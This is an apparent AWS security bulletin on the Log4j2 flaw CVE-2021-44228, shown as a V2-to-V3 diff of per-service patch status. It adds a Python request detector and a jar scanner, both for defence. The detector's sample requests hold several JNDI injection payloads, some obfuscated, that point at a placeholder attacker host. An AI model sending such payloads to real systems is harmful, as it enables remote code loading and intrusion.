v2->v3

[V2] Last Updated Date:2021/12/13 1:42 PM PDT
[V3] Last Updated Date: 2021/12/14 2:45 PM PST
[V2] AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2” utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.
[V2] We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, or to do so by using their operating system’s software update mechanism. Additional service-specific information is below.
[V2] If you need additional details or assistance, please contact AWS Support.
[V3] AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2” utility (CVE-2021-44228).
[V3] Responding to security issues such as this one shows the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers’ data and workloads. We’re taking this issue very seriously, and our world-class team of engineers has been working around the clock on our response and remediation. We expect to rapidly restore our full state of defense in depth.
[V3] We continue to recommend that our customers take action to update all their applications and services by patching for known issues like this one, and continue to follow our Well-Architected guidance.
[V3] Additional service-specific information is provided below. If you need additional details or assistance, please contact AWS Support.
[V2] S3
S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.
[V3] Amazon API Gateway
As of December 13, 2021, all Amazon API Gateway hosts have been patched to mitigate the Log4j issue referenced in CVE-2021-44228.
[V3] Amazon CloudFront
Amazon CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
[V2] Amazon OpenSearch
Amazon OpenSearch Service is deploying a service software update, version R20211203-P2, which contains an updated version of Log4j2. We will notify customers as the update becomes available in their regions, and update this bulletin once it is available worldwide.
[V2] AWS Lambda
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.
[V2] AWS CloudHSM
CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading CloudHSM JCE SDK to version 3.4.1 or higher.
[V2] Amazon EC2
The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
[V2] API Gateway
We are updating API Gateway to use a version of Log4j2 that mitigates the issue. You may observe periodic latency increases for some APIs during these updates.
AWS Greengrass
Updates for all Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.
CloudFront
CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
EMR
CVE-2021-44228 impacts Apache Log4j 2 versions 2.0-beta9 through 2.14.1 when they process inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
Lake Formation
Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the security issue with versions referenced in CVE-2021-44228.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AMS
We are actively monitoring this issue, and are working on addressing it for any AMS services which use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, or by using their operating system's software update mechanism.
Amazon Neptune
Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during update.
NICE
Due to CVE-2021-44228 in the Apache Log4j library, which is included in EnginFrame versions 2020.0 through 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.
Please feel free to contact us.
Kafka
Managed Streaming for Apache Kafka is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and is applying updates as required. Please note that the builds of Apache Kafka and Apache ZooKeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use the Log4j 2.x library and are being patched where needed.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed in a single-tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised to update the Log4j version you use there as well.
AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact us through AWS Support.
RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.
[V2/V3] Amazon Connect
Amazon Connect services have been updated to mitigate the issues identified in CVE-2021-44228.
[V2/V3] Amazon DynamoDB
Amazon DynamoDB and Amazon DynamoDB Accelerator (DAX) have been updated to mitigate the issues identified in CVE-2021-44228.
[V3] Amazon EC2
The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228. More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
Amazon ElastiCache
Amazon ElastiCache’s Redis engine does not include Log4j2. Amazon ElastiCache completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
Amazon EMR
CVE-2021-44228 impacts Apache Log4j 2 versions 2.0-beta9 through 2.14.1 when they process inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Apache Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
AWS IoT SiteWise Edge
Updates for all AWS IoT SiteWise Edge components that use Log4j were made available for deployment on 12/13/2021. These components are: OPC-UA collector (v2.0.3), Data processing pack (v2.0.14), and Publisher (v2.0.2). AWS recommends that customers who are using these components deploy the latest versions to their SiteWise Edge gateways.
[V2/V3] Amazon Keyspaces (for Apache Cassandra)
Amazon Keyspaces (for Apache Cassandra) has been updated to mitigate the issues identified in CVE-2021-44228.
[V3] Amazon Kinesis Data Analytics
The versions of Apache Flink supported by Amazon Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.
We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available within the service’s documentation.
Amazon Kinesis Data Streams
We are actively patching all sub-systems that use Log4j2 by applying updates. The Kinesis Client Library (KCL) version 2.x and the Kinesis Producer Library (KPL) are not impacted. For customers using KCL 1.x, we have released an updated version, and we strongly recommend that all KCL 1.x customers upgrade to KCL version 1.14.5 (or higher).
Amazon Managed Streaming for Apache Kafka (MSK)
We are aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache ZooKeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use the Log4j 2.x library and are being patched where needed.
Amazon Managed Workflows for Apache Airflow (MWAA)
MWAA has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MWAA service code (AWS specific) and open source code (Apache Airflow).
As of Dec 14, 2021, we have completed all required updates to the MWAA service code to address the issue. Apache Airflow does not use Log4j2 and is not affected by this issue.
We strongly encourage customers who have added Log4j2 to their environments to update to the latest version.
Amazon MemoryDB for Redis
Amazon MemoryDB for Redis completed patching the Apache Log4j2 issue (CVE-2021-44228) on December 12, 2021.
[V2/V3] Amazon MQ
Amazon MQ has two areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).
As of Dec 13, 2021, we have completed all required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.2.x, which is not affected by this issue. RabbitMQ does not use Log4j and is not affected by this issue.
[V2] Kinesis Data Analytics
The versions of Apache Flink supported by Kinesis Data Analytics include Apache Log4j versions between 2.0 and 2.14.1. Kinesis Data Analytics applications operate in single-tenant, isolated environments and cannot interact with one another.
We are updating the version of Log4j available to Kinesis Data Analytics customer applications in all AWS regions. Applications started or updated after 6:30 PM PST on 12/12/2021 will automatically receive the updated patch. Customers whose applications were started or updated before then can ensure that their applications run on the updated version of Log4j by calling the Kinesis Data Analytics UpdateApplication API. More information about the UpdateApplication API is available in the service’s documentation.
[V3] Amazon Neptune
All active Amazon Neptune clusters have been automatically updated to mitigate the issues identified in CVE-2021-44228.
[V3] Amazon OpenSearch Service
Amazon OpenSearch Service has released a critical service software update, R20211203-P2, that contains an updated version of Log4j2 in all regions. We strongly recommend that customers update their OpenSearch clusters to this release as soon as possible.
Amazon RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j2 library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.
Amazon S3
Amazon S3 completed patching for the Apache Log4j2 issue (CVE-2021-44228) for S3’s data ingress and egress on December 11, 2021. We have also completed patching all other S3 systems that used Log4j2.
Amazon Simple Notification Service (SNS)
Amazon SNS systems that serve customer traffic are patched against the Log4j2 issue. We are working to apply the Log4j2 patch to sub-systems that operate separately from SNS’s systems that serve customer traffic.
Amazon Simple Workflow Service (SWF)
Amazon Simple Workflow Service (SWF) has been updated to mitigate the issues identified in CVE-2021-44228.
AWS CloudHSM
AWS CloudHSM JCE SDK versions earlier than 3.4.1 include a version of Apache Log4j affected by this issue. On December 10, 2021, CloudHSM released JCE SDK v3.4.1 with a fixed version of Apache Log4j. If you use CloudHSM JCE versions earlier than 3.4.1, you may be impacted and should mitigate the issue by upgrading the CloudHSM JCE SDK to version 3.4.1 or higher.
AWS Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at the Amazon Linux Security Center.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed in a single-tenant environment. If you have uploaded a custom jar file for use in your ETL jobs or Development Endpoints which includes a specific version of Apache Log4j, then you are advised to update your jar to use the latest version of Apache Log4j.
AWS Glue is also proactively applying the updates to new Spark environments across all supported regions. If you have questions or would like additional assistance, please contact AWS Support.
AWS Greengrass
Updates for all AWS Greengrass V2 components that use Log4j are available for deployment as of 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
The Stream Manager feature of Greengrass versions 1.10.x and 1.11.x uses Log4j. An update for the Stream Manager feature is included in Greengrass patch versions 1.10.5 and 1.11.5, which are both available as of 12/12/2021. We strongly recommend that customers on versions 1.10.x and 1.11.x who have Stream Manager enabled on their devices (or may enable it in the future) update their devices to the latest versions.
AWS Lake Formation
AWS Lake Formation service hosts are being updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.
AWS Lambda
AWS Lambda does not include Log4j2 in its managed runtimes or base container images. These are therefore not affected by the issue described in CVE-2021-44228. Customers using the aws-lambda-java-log4j2 library in their functions will need to update to version 1.3.0 and redeploy.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AWS Step Functions
AWS Step Functions has been updated to mitigate the issues identified in CVE-2021-44228.
AWS Web Application Firewall (WAF)
To improve detection and mitigation relating to the recent Log4j security issue, customers of CloudFront, Application Load Balancer (ALB), API Gateway, and AppSync can optionally enable AWS WAF and apply two AWS Managed Rules (AMR): AWSManagedRulesKnownBadInputsRuleSet and AWSManagedRulesAnonymousIpList.
AWSManagedRulesKnownBadInputsRuleSet inspects the request URI, body, and commonly used headers, while AWSManagedRulesAnonymousIpList helps block requests from services that allow the obfuscation of viewer identity. You can apply these rules by creating an AWS WAF web ACL, adding one or both rule groups to your web ACL, and then associating the web ACL with your CloudFront distribution, ALB, API Gateway or AppSync GraphQL APIs.
We continue to iterate on the AWSManagedRulesKnownBadInputsRuleSet rule group as we learn more. To receive automatic updates to AWSManagedRulesKnownBadInputsRuleSet, choose the default version. Customers using AWS WAF Classic will need to migrate to AWS WAF or create custom regex match conditions. AWS Firewall Manager lets customers configure AWS WAF rules across multiple AWS accounts and resources from a single place: you can group rules, build policies, and centrally apply those policies across your entire infrastructure.
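What a "known bad inputs" inspection of the URI, body and headers has to cope with for this issue, as an added illustration that is not AWS's managed rule group (AWS maintains those patterns and does not publish them) and not code from the bulletin: the detector below percent-decodes each request part, unwinds the nested ${lower:…}, ${upper:…} and ${env:…:-…} lookups that Log4j's substitutor would evaluate before the JNDI lookup fires, and flags the resulting ${jndi:…} expression that CVE-2021-44228 turns on. The sample requests are constructed, and attacker.example is a placeholder hostname.

```python
import re
import urllib.parse

# Innermost lookup: a ${...} whose body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the obfuscation has been unwound.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample requests (uri, headers, body); none of this is real traffic.
SAMPLE_REQUESTS = [
    ("/index.html", {"User-Agent": "Mozilla/5.0"}, ""),
    ("/login?user=${jndi:ldap://attacker.example/a}", {"User-Agent": "curl/7.79.1"}, ""),
    ("/", {"User-Agent": "${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://attacker.example/a}"}, ""),
    ("/", {"X-Api-Version": "%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D"}, ""),
    ("/api", {"Content-Type": "application/json"},
     '{"q": "${${env:NOT_SET:-j}ndi:dns://attacker.example/x}"}'),
    ("/search?q=%24%7Bdate%3AYYYY%7D", {}, ""),
]


def url_decode(value, rounds=3):
    """Percent-decode repeatedly; double-encoding is a common way past naive matchers."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def _resolve_inner(match):
    """Evaluate one innermost ${...} roughly as Log4j's substitutor would, minus side effects.

    Only what is needed to unwind common obfuscation is modelled: ${lower:x}/${upper:x}
    transform x, ${env:NAME:-d}, ${sys:NAME:-d} and ${::-d} yield the default d, any other
    lookup collapses to the empty string, and ${jndi:...} is left in place for detection.
    """
    expr = match.group(1)
    key, _, rest = expr.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return match.group(0)
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    return ""


def contains_jndi_lookup(value, max_rounds=10):
    """True if value carries a JNDI lookup, directly or after unwinding nested lookups."""
    text = url_decode(value)
    for _ in range(max_rounds):
        if JNDI_LOOKUP.search(text):
            return True
        resolved = INNER_LOOKUP.sub(_resolve_inner, text)
        if resolved == text:  # nothing left to unwind
            return False
        text = resolved
    return bool(JNDI_LOOKUP.search(text))


def inspect_request(uri, headers, body):
    """Return the request parts ('uri', 'header:<name>', 'body') carrying a JNDI lookup."""
    flagged = []
    if contains_jndi_lookup(uri):
        flagged.append("uri")
    for name, value in headers.items():
        if contains_jndi_lookup(value):
            flagged.append(f"header:{name}")
    if contains_jndi_lookup(body):
        flagged.append("body")
    return flagged


def scan_samples():
    """Inspect every constructed sample; one flagged-parts list per request."""
    return [inspect_request(uri, headers, body) for uri, headers, body in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (uri, _, _), flagged in zip(SAMPLE_REQUESTS, scan_samples()):
        print(f"{uri!r:48} -> {'BLOCK ' + ','.join(flagged) if flagged else 'allow'}")
```

Two things this makes concrete: a literal match on "${jndi:" misses the third and fifth samples until the inner lookups are resolved, and no fixed list of encodings is ever complete, which is why the bulletin points customers at the rule group's default version so they pick up new patterns automatically. A WAF in front of the application narrows exposure; the fix remains updating Log4j.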
NICE
Due to CVE-2021-44228 in the Apache Log4j library, which is included in EnginFrame versions 2020.0 through 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version, or update the Log4j library in your EnginFrame installation following the instructions on the support website.
Please feel free to contact us.
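Several sections above leave it to the customer to find their own copies of Log4j: custom jars in Glue jobs and development endpoints, the frameworks on EMR clusters, KCL 1.x, the aws-lambda-java-log4j2 library, the CloudHSM JCE SDK and EnginFrame. As an added example that is not AWS's code and not from the bulletin, the scanner below walks a directory of jar/war/ear files, descends into archives nested inside them (fat jars, WEB-INF/lib), reads log4j-core's Maven pom.properties for its version, and checks whether JndiLookup.class is still present, so it separates a copy in the bulletin's 2.0 to 2.14.1 range that is still exposed from one where the class was stripped as a stopgap, and from shaded jars whose version cannot be read. The sample archives are constructed in a temporary directory; their names and contents are illustrative.

```python
import io
import os
import re
import tempfile
import zipfile

# Markers used to recognise log4j-core inside any archive, however it was packaged.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Range named in the bulletin: 2.0 through 2.14.1; 2.15.0 is the first release with the fix.
AFFECTED_MIN, FIXED_MIN = (2, 0), (2, 15)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0); anything else -> None."""
    match = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        return None
    return tuple(int(part) for part in match.groups() if part is not None)


def classify(version, jndi_present):
    """Status for one archive, or None when nothing identifies it as log4j-core."""
    if version is None:
        return "review: JndiLookup.class present, version unknown" if jndi_present else None
    if not (AFFECTED_MIN <= version < FIXED_MIN):
        return "not in affected range"
    return "vulnerable" if jndi_present else "mitigated: JndiLookup.class removed"


def inspect_archive(data, label, findings):
    """Classify one archive (as bytes) and recurse into archives nested inside it."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = set(archive.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in archive.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = parse_version(line.split("=", 1)[1])
    status = classify(version, JNDI_LOOKUP_CLASS in names)
    if status:
        findings[label] = status
    for name in sorted(names):
        if name.endswith(ARCHIVE_SUFFIXES):  # fat jars, WEB-INF/lib, ear modules
            inspect_archive(archive.read(name), f"{label}!{name}", findings)


def scan_tree(root):
    """Map archive label -> status for every jar/war/ear under root, nested ones included."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in sorted(filenames):
            if filename.endswith(ARCHIVE_SUFFIXES):
                path = os.path.join(dirpath, filename)
                label = os.path.relpath(path, root).replace(os.sep, "/")
                with open(path, "rb") as fh:
                    inspect_archive(fh.read(), label, findings)
    return findings


def _make_archive(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, content in entries.items():
            archive.writestr(name, content)
    return buf.getvalue()


def build_sample_tree(root):
    """Write constructed sample archives (not real artifacts) that exercise each outcome."""
    def pom(version):
        return f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n"
    stub_class = b"\xca\xfe\xba\xbe"  # class-file magic only; the body is irrelevant here
    samples = {
        "lib/log4j-core-2.14.1.jar": _make_archive({POM_PROPERTIES: pom("2.14.1"), JNDI_LOOKUP_CLASS: stub_class}),
        "lib/log4j-core-2.15.0.jar": _make_archive({POM_PROPERTIES: pom("2.15.0"), JNDI_LOOKUP_CLASS: stub_class}),
        "lib/log4j-core-2.14.1-stripped.jar": _make_archive({POM_PROPERTIES: pom("2.14.1")}),
        "lib/shaded-app.jar": _make_archive({JNDI_LOOKUP_CLASS: stub_class, "com/example/App.class": stub_class}),
        "lib/unrelated.jar": _make_archive({"com/example/Util.class": stub_class}),
        "app.war": _make_archive({"WEB-INF/lib/log4j-core-2.14.1.jar": _make_archive(
            {POM_PROPERTIES: pom("2.14.1"), JNDI_LOOKUP_CLASS: stub_class})}),
    }
    for relative, data in samples.items():
        path = os.path.join(root, relative)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the sample tree in a fresh temporary directory and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for label, status in sorted(demo().items()):
        print(f"{status:48} {label}")
```

Point it at a Glue script bucket synced locally, an EMR node's /usr/lib, or a Lambda deployment package and read the "review" and "vulnerable" lines first. Two caveats: the version check implements exactly the range the bulletin names, so Apache's later fixed backports for older Java runtimes (2.12.2 for Java 7, 2.3.1 for Java 6) sit below 2.15.0 and are reported as vulnerable, which makes a version-only hit a prompt to confirm the exact release rather than proof; and a stripped JndiLookup.class only shows that the stopgap was applied, it does not make the copy equivalent to an updated release.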